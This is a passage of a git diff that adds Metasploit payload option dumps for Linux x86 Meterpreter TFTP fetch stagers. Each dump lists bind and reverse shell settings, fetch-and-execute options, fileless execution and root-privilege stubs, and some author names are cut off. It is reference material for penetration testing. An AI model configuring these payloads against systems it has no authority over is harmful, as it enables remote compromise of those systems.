0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..a964278 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid: +========================= + +bb + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME htYaHzzu no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_nonx_tcp.txt new file mode 100644 index 0000000..7057ac5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_nonx_tcp.txt @@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp: +========================= + +om> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pzUTdhDd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..4354366 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp.txt @@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_tcp: +========================= + + + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dltZQuwsI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..e393635 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp_uuid.txt @@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid: +========================= + +am Webb + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DWoraWwKGybN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-find_tag.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-find_tag.txt new file mode 100644 index 0000000..e141f6b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-find_tag.txt @@ -0,0 +1,101 @@ + + Name: TFTP Fetch, Find Tag Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/find_tag + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 108 + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/find_tag: +========================= + +b@rapid7.com> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EQRJfWjqVl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG B2Pi yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..fd9b876 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_ipv6_tcp.txt @@ -0,0 +1,110 @@ + + Name: TFTP Fetch, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp: +========================= + +d7.com> + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dIQwCFOyn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that 